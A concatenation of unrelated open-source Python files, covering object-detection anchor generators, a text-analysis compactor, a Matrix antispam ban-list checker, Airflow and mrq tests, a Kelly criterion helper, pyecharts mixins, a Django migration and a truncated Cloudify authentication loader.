return [len(s) * len(a) for s, a in zip(self.sizes, self.aspect_ratios)]
def get_num_acnhors_per_level(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
if self.num_anchors_per_level is None:
raise RuntimeError("Need to forward features maps before "
"get_num_acnhors_per_level can be called")
return self.num_anchors_per_level
class AnchorGenerator3D(AnchorGenerator2D):
def __init__(self,
sizes: Sequence[Union[int, Sequence[int]]] = (128, 256, 512),
aspect_ratios: Sequence[Union[float, Sequence[float]]] = (0.5, 1.0, 2.0),
zsizes: Sequence[Union[int, Sequence[int]]] = (4, 4, 4),
**kwargs):
"""
Helper to generate anchors for different input sizes
Args:
sizes (Sequence[Union[int, Sequence[int]]]): anchor sizes for each feature map
(length should match the number of feature maps)
aspect_ratios (Sequence[Union[float, Sequence[float]]]): anchor aspect ratios:
height/width, e.g. (0.5, 1, 2). if Seq[Seq] is provided, it should have
the same length as sizes
zsizes (Sequence[Union[int, Sequence[int]]]): sizes along z dimension
"""
super().__init__(sizes, aspect_ratios)
if not isinstance(zsizes[0], (Sequence, list, tuple)):
zsizes = (zsizes,) * len(sizes)
self.zsizes = zsizes
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
Compute anchors for all pairs of sclaes and ratios and save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(sizes, aspect_ratios, zsizes, dtype, device)
for sizes, aspect_ratios, zsizes in zip(self.sizes, self.aspect_ratios, self.zsizes)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(scales: Tuple[int], aspect_ratios: Tuple[float], zsizes: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu") -> torch.Tensor:
"""
Generate anchors for a pair of scales and ratios
Args:
scales (Tuple[int]): scales of anchors, e.g. (32, 64, 128)
aspect_ratios (Tuple[float]): aspect ratios of height/width, e.g. (0.5, 1, 2)
zsizes (Tuple[int]): scale along z dimension
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
Tensor: anchors of shape [n(scales) * n(ratios) * n(zscales) , dim * 2]
"""
base_anchors_2d = AnchorGenerator2D.generate_anchors(
scales, aspect_ratios, dtype=dtype, device=device)
zanchors = torch.cat(
[torch.as_tensor([-z, z], dtype=dtype, device=device).repeat(
base_anchors_2d.shape[0], 1) for z in zsizes], dim=0)
base_anchors_3d = torch.cat(
[base_anchors_2d.repeat(len(zsizes), 1), (zanchors / 2.).round()], dim=1)
return base_anchors_3d
def grid_anchors(self, grid_sizes: Sequence[Sequence[int]],
strides: Sequence[Sequence[int]]) -> Tuple[List[torch.Tensor], List[int]]:
"""
Distribute anchors over feature maps
Args:
grid_sizes (Sequence[Sequence[int]]): spatial sizes of feature maps
strides (Sequence[Sequence[int]]): stride of each feature map
Returns:
List[torch.Tensor]: Anchors for each feature maps
List[int]: number of anchors per level
"""
assert len(grid_sizes) == len(strides)
assert len(grid_sizes) == len(self.cell_anchors)
anchors = []
_i = 0
anchor_per_level = []
for size, stride, base_anchors in zip(grid_sizes, strides, self.cell_anchors):
size0, size1, size2 = size
stride0, stride1, stride2 = stride
dtype, device = base_anchors.dtype, base_anchors.device
shifts_x = torch.arange(0, size0, dtype=dtype, device=device) * stride0
shifts_y = torch.arange(0, size1, dtype=dtype, device=device) * stride1
shifts_z = torch.arange(0, size2, dtype=dtype, device=device) * stride2
shift_x, shift_y, shift_z = torch.meshgrid(shifts_x, shifts_y, shifts_z)
shift_x = shift_x.reshape(-1)
shift_y = shift_y.reshape(-1)
shift_z = shift_z.reshape(-1)
shifts = torch.stack((shift_x, shift_y, shift_x, shift_y, shift_z, shift_z), dim=1)
_anchors = (shifts.view(-1, 1, 6) + base_anchors.view(1, -1, 6)).reshape(-1, 6)
anchors.append(_anchors)
anchor_per_level.append(_anchors.shape[0])
logger.debug(f"Generated {_anchors.shape[0]} anchors and expected "
f"{size0 * size1 * size2 * self.num_anchors_per_location()[_i]} "
f"anchors on level {_i}.")
_i += 1
return anchors, anchor_per_level
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(s) * len(a) * len(z) for s, a, z in zip(self.sizes, self.aspect_ratios, self.zsizes)]
class AnchorGenerator2DS(AnchorGenerator2D):
def __init__(self,
width: Sequence[Union[int, Sequence[int]]],
height: Sequence[Union[int, Sequence[int]]],
**kwargs,
):
"""
Helper to generate anchors for different input sizes
Uses a different parametrization of anchors
(if Sequence[int] is provided it is interpreted as one
value per feature map size)
Args:
width: sizes along width dimension
height: sizes along height dimension
"""
# TODO: check width and height statements
super().__init__()
if not isinstance(width[0], Sequence):
width = [(w,) for w in width]
if not isinstance(height[0], Sequence):
height = [(h,) for h in height]
self.width = width
self.height = height
assert len(self.width) == len(self.height)
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype,
device: Union[torch.device, str] = "cpu") -> None:
"""
Compute anchors for all pairs of sclaes and ratios and
save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(w, h, dtype, device)
for w, h in zip(self.width, self.height)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(width: Tuple[int],
height: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu",
) -> torch.Tensor:
"""
Generate anchors for given width, height and depth sizes
Args:
width: sizes along width dimension
height: sizes along height dimension
Returns:
Tensor: anchors of shape [n(width) * n(height), dim * 2]
"""
all_sizes = torch.tensor(list(product(width, height)),
dtype=dtype, device=device) / 2
anchors = torch.stack([-all_sizes[:, 0], -all_sizes[:, 1],
all_sizes[:, 0], all_sizes[:, 1]], dim=1)
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(w) * len(h) for w, h in zip(self.width, self.height)]
class AnchorGenerator3DS(AnchorGenerator3D):
def __init__(self,
width: Sequence[Union[int, Sequence[int]]],
height: Sequence[Union[int, Sequence[int]]],
depth: Sequence[Union[int, Sequence[int]]],
**kwargs,
):
"""
Helper to generate anchors for different input sizes
Uses a different parametrization of anchors
(if Sequence[int] is provided it is interpreted as one
value per feature map size)
Args:
width: sizes along width dimension
height: sizes along height dimension
depth: sizes along depth dimension
"""
# TODO: check width and height statements
super().__init__()
if not isinstance(width[0], Sequence):
width = [(w,) for w in width]
if not isinstance(height[0], Sequence):
height = [(h,) for h in height]
if not isinstance(depth[0], Sequence):
depth = [(d,) for d in depth]
self.width = width
self.height = height
self.depth = depth
assert len(self.width) == len(self.height) == len(self.depth)
if kwargs:
logger.info(f"Discarding anchor generator kwargs {kwargs}")
def set_cell_anchors(self, dtype: torch.dtype, device: Union[torch.device, str] = "cpu") -> None:
"""
Compute anchors for all pairs of scales and ratios and save them inside :param:`cell_anchors`
if they were not computed before
Args:
dtype (torch.dtype): data type of anchors
device (Union[torch.device, str]): target device of anchors
Returns:
None (result is saved into :param:`self.cell_anchors`)
"""
if self.cell_anchors is not None:
return
cell_anchors = [
self.generate_anchors(w, h, d, dtype, device)
for w, h, d in zip(self.width, self.height, self.depth)
]
self.cell_anchors = cell_anchors
@staticmethod
def generate_anchors(width: Tuple[int],
height: Tuple[int],
depth: Tuple[int],
dtype: torch.dtype = torch.float,
device: Union[torch.device, str] = "cpu") -> torch.Tensor:
"""
Generate anchors for given width, height and depth sizes
Args:
width: sizes along width dimension
height: sizes along height dimension
depth: sizes along depth dimension
Returns:
Tensor: anchors of shape [n(width) * n(height) * n(depth) , dim * 2]
"""
all_sizes = torch.tensor(list(product(width, height, depth)),
dtype=dtype, device=device) / 2
anchors = torch.stack(
[-all_sizes[:, 0], -all_sizes[:, 1], all_sizes[:, 0], all_sizes[:, 1],
-all_sizes[:, 2], all_sizes[:, 2]], dim=1
)
return anchors
def num_anchors_per_location(self) -> List[int]:
"""
Number of anchors per resolution
Returns:
List[int]: number of anchors per positions for each resolution
"""
return [len(w) * len(h) * len(d)
for w, h, d in zip(self.width, self.height, self.depth)]
|
scattertext/termcompaction/ClassPercentageCompactor.py | shettyprithvi/scattertext | 1,823 | 12770384 | <reponame>shettyprithvi/scattertext
import numpy as np
from scattertext.termranking import AbsoluteFrequencyRanker
class ClassPercentageCompactor(object):
def __init__(self,
term_ranker=AbsoluteFrequencyRanker,
term_count=2):
'''
Limit terms to ones that make up a minimum percentage
of documents in a category. Given a term_count, set the threshold
to that of the smallest class.
Parameters
----------
term_ranker : TermRanker
term_count : int
'''
self.term_ranker = term_ranker
self.term_count = term_count
def compact(self, term_doc_matrix, non_text=False):
'''
Parameters
-------
term_doc_matrix : TermDocMatrix
non_text : bool
Returnss
-------
New term doc matrix
'''
ranker = self.term_ranker(term_doc_matrix)
if non_text:
ranker = ranker.use_non_text_features()
tdf = ranker.get_ranks()
tdf_sum = tdf.sum(axis=0)
tdf_portions = tdf / tdf_sum
threshold = np.max(self.term_count / tdf_sum)
terms_to_remove = tdf_portions[~(tdf_portions > threshold).any(axis=1)].index
return term_doc_matrix.remove_terms(terms_to_remove, non_text=non_text)
|
synapse_antispam/mjolnir/antispam.py | grahamc/mjolnir | 153 | 12770404 | # -*- coding: utf-8 -*-
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from .list_rule import ALL_RULE_TYPES, RECOMMENDATION_BAN
from .ban_list import BanList
from synapse.types import UserID
logger = logging.getLogger("synapse.contrib." + __name__)
class AntiSpam(object):
def __init__(self, config, api):
self.block_invites = config.get("block_invites", True)
self.block_messages = config.get("block_messages", False)
self.block_usernames = config.get("block_usernames", False)
self.list_room_ids = config.get("ban_lists", [])
self.rooms_to_lists = {} # type: Dict[str, BanList]
self.api = api
# Now we build the ban lists so we can match them
self.build_lists()
def build_lists(self):
for room_id in self.list_room_ids:
self.build_list(room_id)
def build_list(self, room_id):
logger.info("Rebuilding ban list for %s" % (room_id))
self.get_list_for_room(room_id).build()
def get_list_for_room(self, room_id):
if room_id not in self.rooms_to_lists:
self.rooms_to_lists[room_id] = BanList(api=self.api, room_id=room_id)
return self.rooms_to_lists[room_id]
def is_user_banned(self, user_id):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.user_rules:
if rule.matches(user_id):
return rule.action == RECOMMENDATION_BAN
return False
def is_room_banned(self, invite_room_id):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.room_rules:
if rule.matches(invite_room_id):
return rule.action == RECOMMENDATION_BAN
return False
def is_server_banned(self, server_name):
for room_id in self.rooms_to_lists:
ban_list = self.rooms_to_lists[room_id]
for rule in ban_list.server_rules:
if rule.matches(server_name):
return rule.action == RECOMMENDATION_BAN
return False
# --- spam checker interface below here ---
def check_event_for_spam(self, event):
room_id = event.get("room_id", "")
event_type = event.get("type", "")
state_key = event.get("state_key", None)
# Rebuild the rules if there's an event for our ban lists
if state_key is not None and event_type in ALL_RULE_TYPES and room_id in self.list_room_ids:
logger.info("Received ban list event - updating list")
self.get_list_for_room(room_id).build(with_event=event)
return False # Ban list updates aren't spam
if not self.block_messages:
return False # not spam (we aren't blocking messages)
sender = UserID.from_string(event.get("sender", ""))
if self.is_user_banned(sender.to_string()):
return True
if self.is_server_banned(sender.domain):
return True
return False # not spam (as far as we're concerned)
def user_may_invite(self, inviter_user_id, invitee_user_id, room_id):
if not self.block_invites:
return True # allowed (we aren't blocking invites)
sender = UserID.from_string(inviter_user_id)
if self.is_user_banned(sender.to_string()):
return False
if self.is_room_banned(room_id):
return False
if self.is_server_banned(sender.domain):
return False
return True # allowed (as far as we're concerned)
def check_username_for_spam(self, user_profile):
if not self.block_usernames:
return True # allowed (we aren't blocking based on usernames)
# Check whether the user ID or display name matches any of the banned
# patterns.
return self.is_user_banned(user_profile["user_id"]) or self.is_user_banned(user_profile["display_name"])
def user_may_create_room(self, user_id):
return True # allowed
def user_may_create_room_alias(self, user_id, room_alias):
return True # allowed
def user_may_publish_room(self, user_id, room_id):
return True # allowed
@staticmethod
def parse_config(config):
return config # no parsing needed
|
tests/utils/test_task_handler_with_custom_formatter.py | npodewitz/airflow | 8,092 | 12770417 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import pytest
from airflow.config_templates.airflow_local_settings import DEFAULT_LOGGING_CONFIG
from airflow.models import DAG, TaskInstance
from airflow.operators.empty import EmptyOperator
from airflow.utils.log.logging_mixin import set_context
from airflow.utils.state import DagRunState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2019, 1, 1)
TASK_HANDLER = 'task'
TASK_HANDLER_CLASS = 'airflow.utils.log.task_handler_with_custom_formatter.TaskHandlerWithCustomFormatter'
PREV_TASK_HANDLER = DEFAULT_LOGGING_CONFIG['handlers']['task']
DAG_ID = "task_handler_with_custom_formatter_dag"
TASK_ID = "task_handler_with_custom_formatter_task"
@pytest.fixture(scope="module", autouse=True)
def custom_task_log_handler_config():
DEFAULT_LOGGING_CONFIG['handlers']['task'] = {
'class': TASK_HANDLER_CLASS,
'formatter': 'airflow',
'stream': 'sys.stdout',
}
logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)
logging.root.disabled = False
yield
DEFAULT_LOGGING_CONFIG['handlers']['task'] = PREV_TASK_HANDLER
logging.config.dictConfig(DEFAULT_LOGGING_CONFIG)
@pytest.fixture()
def task_instance():
dag = DAG(DAG_ID, start_date=DEFAULT_DATE)
task = EmptyOperator(task_id=TASK_ID, dag=dag)
dagrun = dag.create_dagrun(DagRunState.RUNNING, execution_date=DEFAULT_DATE, run_type=DagRunType.MANUAL)
ti = TaskInstance(task=task, run_id=dagrun.run_id)
ti.log.disabled = False
yield ti
clear_db_runs()
def assert_prefix(task_instance: TaskInstance, prefix: str) -> None:
handler = next((h for h in task_instance.log.handlers if h.name == TASK_HANDLER), None)
assert handler is not None, "custom task log handler not set up correctly"
assert handler.formatter is not None, "custom task log formatter not set up correctly"
expected_format = f"{prefix}:{handler.formatter._fmt}"
set_context(task_instance.log, task_instance)
assert expected_format == handler.formatter._fmt
def test_custom_formatter_default_format(task_instance):
"""The default format provides no prefix."""
assert_prefix(task_instance, "")
@conf_vars({("logging", "task_log_prefix_template"): "{{ti.dag_id }}-{{ ti.task_id }}"})
def test_custom_formatter_custom_format_not_affected_by_config(task_instance):
assert_prefix(task_instance, f"{DAG_ID}-{TASK_ID}")
|
tests/test_raw.py | fredstro/mrq | 745 | 12770434 | from mrq.job import Job
import datetime
from mrq.queue import Queue
import time
import pytest
@pytest.mark.parametrize(["p_queue", "p_pushback", "p_timed", "p_flags"], [
["test_timed_set", False, True, "--greenlets 10"],
["pushback_timed_set", True, True, "--greenlets 10"],
["test_sorted_set", False, False, "--greenlets 1"]
])
def test_raw_sorted(worker, p_queue, p_pushback, p_timed, p_flags):
worker.start(flags="%s --config tests/fixtures/config-raw1.py" %
p_flags, queues=p_queue)
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
current_time = int(time.time())
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
# Schedule one in the past, one in the future
worker.send_raw_tasks(p_queue, {
"aaa": current_time - 10,
"bbb": current_time + 5,
"ccc": current_time + 10
}, block=False)
# Re-schedule
worker.send_raw_tasks(p_queue, {
"ccc": current_time + 6
}, block=False)
time.sleep(3)
if not p_timed:
assert Queue(p_queue).size() == 0
assert test_collection.count() == 3
assert list(test_collection.find(projection={"params": 1, "_id": 0}).limit(1)) == [
{"params": {"sorted_set": "aaa"}}
]
return
if p_pushback:
assert Queue(p_queue).size() == 3
assert set(Queue(p_queue).list_raw_jobs()) == set([b"bbb", b"ccc", b"aaa"])
else:
assert Queue(p_queue).size() == 2
assert set(Queue(p_queue).list_raw_jobs()) == set([b"bbb", b"ccc"])
# The second one should not yet even exist in mrq_jobs
assert jobs_collection.count() == 1
assert list(jobs_collection.find())[0]["status"] == "success"
assert list(test_collection.find(projection={"params": 1, "_id": 0})) == [
{"params": {"timed_set": "aaa"}}
]
# Then wait for the second job to be done
time.sleep(5)
if p_pushback:
assert Queue(p_queue).size() == 3
else:
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 3
assert list(jobs_collection.find())[1]["status"] == "success"
assert list(jobs_collection.find())[2]["status"] == "success"
assert list(jobs_collection.find())[2]["worker"]
assert test_collection.count() == 3
@pytest.mark.parametrize("has_subqueue", [False, True])
@pytest.mark.parametrize(["p_queue", "p_set"], [
["test_raw", False],
["test_set", True]
])
def test_raw_set(worker, has_subqueue, p_queue, p_set):
flags = "--greenlets 10 --config tests/fixtures/config-raw1.py"
if has_subqueue:
flags = "%s --subqueues_refresh_interval=0.1" % flags
# worker should dequeue all subqueues
p_queue = "%s/" % p_queue
worker.start(flags=flags, queues=p_queue)
if has_subqueue:
# queue tasks in p_queue/subqueue
p_queue = "%ssubqueue" % p_queue
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, ["aaa", "bbb", "ccc", "bbb"], block=True)
assert Queue(p_queue).size() == 0
if p_set:
assert jobs_collection.count() == 3
assert jobs_collection.count({"status": "success"}) == 3
assert test_collection.count() == 3
else:
assert jobs_collection.count() == 4
assert jobs_collection.count({"status": "success"}) == 4
assert test_collection.count() == 4
def test_raw_started(worker):
worker.start(
flags="--greenlets 2 --config tests/fixtures/config-raw1.py", queues="teststarted_raw teststartedx")
worker.send_raw_tasks("teststarted_raw", ["f1", "f2", "f3"], block=False)
time.sleep(2)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.find({"status": "started", "queue": "teststartedx"}).count() == 2
assert jobs_collection.count() == 2
worker.mongodb_jobs.tests_flags.insert({"flag": "f1"})
time.sleep(1)
assert jobs_collection.find({"status": "success", "queue": "teststartedx"}).count() == 1
assert jobs_collection.find({"status": "started", "queue": "teststartedx"}).count() == 2
assert jobs_collection.count() == 3
worker.mongodb_jobs.tests_flags.insert({"flag": "f2"})
worker.mongodb_jobs.tests_flags.insert({"flag": "f3"})
time.sleep(1)
worker.stop(block=True, deps=False)
assert jobs_collection.find({"status": "success", "queue": "teststartedx"}).count() == 3
assert jobs_collection.count() == 3
worker.stop_deps()
@pytest.mark.parametrize(["p_queue"], [
["test_raw"],
["test_set"],
["test_timed_set"]
])
def test_raw_remove(worker, p_queue):
worker.start_deps()
worker.send_raw_tasks(
p_queue, ["aa", "bb", "cc"], block=False, start=False)
assert Queue(p_queue).size() == 3
Queue(p_queue).remove_raw_jobs(["aa", "cc"])
assert Queue(p_queue).size() == 1
worker.stop_deps()
def test_raw_exception(worker):
p_queue = "testexception_raw"
worker.start(
flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues=p_queue)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, ["msg1"], block=True)
failjob = list(jobs_collection.find())[0]
assert Queue("default").size() == 0
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 1
assert failjob["status"] == "failed"
worker.stop(deps=False)
worker.start(
deps=False, flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues="default")
worker.send_task(
"mrq.basetasks.utils.JobAction",
{
"id": failjob["_id"],
"action": "requeue"
},
block=True
)
assert Queue("default").size() == 0
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 2
assert list(jobs_collection.find({"_id": failjob["_id"]}))[
0]["status"] == "queued"
assert list(jobs_collection.find({"_id": {"$ne": failjob["_id"]}}))[
0]["status"] == "success"
worker.stop(deps=False)
worker.start(
deps=False, flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues="default testx")
worker.wait_for_idle()
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 2
assert Queue("testx").size() == 0
assert list(jobs_collection.find({"_id": failjob["_id"]}))[
0]["status"] == "failed"
def test_raw_retry(worker):
p_queue = "testretry_raw"
worker.start(
flags="--greenlets 10 --config tests/fixtures/config-raw1.py", queues=p_queue)
jobs_collection = worker.mongodb_jobs.mrq_jobs
assert jobs_collection.count() == 0
assert Queue(p_queue).size() == 0
worker.send_raw_tasks(p_queue, [0], block=True)
failjob = list(jobs_collection.find())[0]
assert Queue("default").size() == 0
assert Queue("testx").size() == 1
assert Queue(p_queue).size() == 0
assert jobs_collection.count() == 1
assert failjob["status"] == "queued"
assert failjob["queue"] == "testx"
@pytest.mark.parametrize(["p_queue", "p_greenlets"], [x1 + x2 for x1 in [
["test_raw default test"],
# ["default test_raw test"],
# ["default test_raw test_set"],
# ["test_set test_raw default"],
# ["test test2 test_set test_raw default"]
] for x2 in [
# [1],
[2],
# [10]
]])
def test_raw_mixed(worker, p_queue, p_greenlets):
worker.start_deps()
worker.send_raw_tasks(
"test_raw", ["aaa", "bbb", "ccc"], start=False, block=False)
worker.send_task("tests.tasks.general.MongoInsert", {
"not_raw": "ddd"
}, start=False, block=False)
assert Queue("test_raw").size() == 3
assert Queue("default").size() == 1
worker.start(flags="--greenlets %s --config tests/fixtures/config-raw1.py" %
p_greenlets, queues=p_queue, deps=False)
test_collection = worker.mongodb_logs.tests_inserts
jobs_collection = worker.mongodb_jobs.mrq_jobs
time.sleep(3)
assert Queue("test_raw").size() == 0
assert Queue("default").size() == 0
assert test_collection.count() == 4
assert jobs_collection.count() == 4
assert jobs_collection.find({"status": "success"}).count() == 4
assert list(jobs_collection.find({"status": "success"}))[0]["worker"]
def test_raw_no_storage(worker):
""" Test tasks that don't store unless they go to error status like 'failed' """
worker.start(
flags="--config tests/fixtures/config-raw1.py",
queues="default testnostorage_raw"
)
jobs_collection = worker.mongodb_jobs.mrq_jobs
test_collection = worker.mongodb_logs.tests_inserts
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.MongoInsert 3"
], block=False)
time.sleep(2)
# No started inserted.
assert jobs_collection.count() == 0
time.sleep(2)
# No success either, but we did insert
assert test_collection.count() == 1
assert jobs_collection.count() == 0
test_collection.remove({})
# However failed tasks get stored.
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.RaiseException 0"
], block=False)
time.sleep(2)
# Failed was inserted.
assert jobs_collection.count({"status": "failed", "path": "tests.tasks.general.RaiseException"}) == 1
# If we requeue and don't raise, should be OK and inserted this time, even in success
# no_storage depends on a raw queue, not a task path.
_id = jobs_collection.find_one()["_id"]
jobs_collection.update({"_id": _id}, {"$set": {"path": "tests.tasks.general.MongoInsert"}})
job = Job(_id).fetch(full_data=True)
job.requeue(queue="default")
time.sleep(1)
assert test_collection.count() == 1
assert jobs_collection.count() == 1
assert jobs_collection.count({"status": "success"}) == 1
jobs_collection.remove({})
# Test with retry: should be inserted
worker.send_raw_tasks("testnostorage_raw", [
"tests.tasks.general.Retry 0"
], block=False)
assert jobs_collection.count({"status": "started"}) == 0
time.sleep(2)
assert jobs_collection.count({"status": "retry"}) == 1
|
qf_lib/common/utils/miscellaneous/kelly.py | webclinic017/qf-lib | 198 | 12770435 | <reponame>webclinic017/qf-lib
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.containers.series.simple_returns_series import SimpleReturnsSeries
def kelly(qf_series: QFSeries) -> float:
"""
Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for the series
of returns/prices.
Kelly Criterion assumptions:
1. You trade the same way you traded in the past.
2. Each return corresponds to one trade.
3. Returns are normally distributed (calculated value will be close to the ideal kelly value even for highly skewed
returns. Test showed that the difference of up to 10% (relative) might occur for extremely skewed distributions.
Parameters
----------
qf_series: QFSeries
timeseries of returns/prices. Each return/price must correspond to one trade.
Returns
-------
float
fraction of money that should be invested
"""
# it is important to convert a series to simple returns and not log returns
returns_tms = qf_series.to_simple_returns() # type: SimpleReturnsSeries
mean = returns_tms.mean()
variance = returns_tms.var()
kelly_criterion_value = mean / variance
return kelly_criterion_value
def kelly_binary(win_probability: float, win_size: float, lose_size: float) -> float:
"""
Calculates the value of the Kelly Criterion (the fraction of money that should be invested) for a bet
that has two possible outcomes.
NOTE: This method should not be used to estimate the kelly value for a timeseries.
Parameters
----------
win_probability:float
probability of winning. Assumes that probability of losing is 1 - win_probability.
win_size: float
gain if we win.
For example: 0.7 means that we get additional 70% of what we bet. (if we bet 10$ and we win we now have 17$)
new_value = old_value * (1 + win_size)
lose_size: float
lose if we lose. This value should be negative.
For example: -0.2 means that we lose 20% of what we bet. (if we bet 10$ and we lose we now have 8$)
new_value = old_value * (1 + lose_size)
Returns
-------
float
fraction of money that should be invested
"""
kelly_value = (-win_size * win_probability + lose_size * win_probability - lose_size) / (win_size * lose_size)
return kelly_value
|
pyecharts/charts/mixins.py | CharileWithZoe/pyecharts | 11,032 | 12770442 | from ..render import engine
class ChartMixin:
def add_js_funcs(self, *fns):
for fn in fns:
self.js_functions.add(fn)
return self
def load_javascript(self):
return engine.load_javascript(self)
class CompositeMixin(ChartMixin):
def __iter__(self):
for chart in self._charts:
yield chart
def __len__(self):
return len(self._charts)
|
oauth/migrations/0003_auto_20190531_0914.py | enjoy-binbin/Django-blog | 111 | 12770470 | <reponame>enjoy-binbin/Django-blog
# Generated by Django 2.1.5 on 2019-05-31 09:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('oauth', '0002_auto_20190512_1129'),
]
operations = [
migrations.AlterModelOptions(
name='oauthconfig',
options={'ordering': ['-add_time'], 'verbose_name': '0-OAuth配置', 'verbose_name_plural': '0-OAuth配置'},
),
migrations.AlterModelOptions(
name='oauthuser',
options={'ordering': ['-add_time'], 'verbose_name': '1-Oauth用户', 'verbose_name_plural': '1-Oauth用户'},
),
]
|
rest-service/manager_rest/security/user_handler.py | TS-at-WS/cloudify-manager | 124 | 12770484 | <filename>rest-service/manager_rest/security/user_handler.py
#########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import string
from flask import current_app
from itsdangerous import BadSignature, SignatureExpired
from ..storage.idencoder import get_encoder
from cloudify.constants import CLOUDIFY_API_AUTH_TOKEN_HEADER
from manager_rest.storage.models import User
from manager_rest.manager_exceptions import NotFoundError
from manager_rest.storage import user_datastore, get_storage_manager
from manager_rest.execution_token import (set_current_execution,
get_current_execution_by_token,
get_execution_token_from_request)
ENCODED_ID_LENGTH = 5
def user_loader(request):
"""Attempt to retrieve the current user from the request
Either from request's Authorization attribute, or from the token header
Having this function makes sure that this will work:
> from flask_security import current_user
> current_user
<manager_rest.storage.models.User object at 0x50d9d10>
:param request: flask's request
:return: A user object, or None if not found
"""
if request.authorization:
return get_user_from_auth(request.authorization)
execution_token = get_execution_token_from_request(request)
if execution_token:
execution = get_current_execution_by_token(execution_token)
set_current_execution(execution) # Sets the request current execution
return execution.creator if execution else None
token = get_token_from_request(request)
if token:
_, _, user, _, _ = get_token_status(token)
return user
api_token = get_api_token_from_request(request)
if api_token:
user, user_token_key = extract_api_token(api_token)
return user
if current_app.external_auth \
and current_app.external_auth.can_extract_user_from_request():
user = current_app.external_auth.get_user_from_request(request)
if isinstance(user, User):
return user
return None
def extract_api_token(api_token):
user_id = api_token[:ENCODED_ID_LENGTH]
user_token_key = api_token[ENCODED_ID_LENGTH:]
user_id = get_encoder().decode(user_id)
try:
user = get_storage_manager().get(User, user_id)
except NotFoundError:
return None, None
return user, user_token_key
def get_user_from_auth(auth):
if not auth or not auth.username:
return None
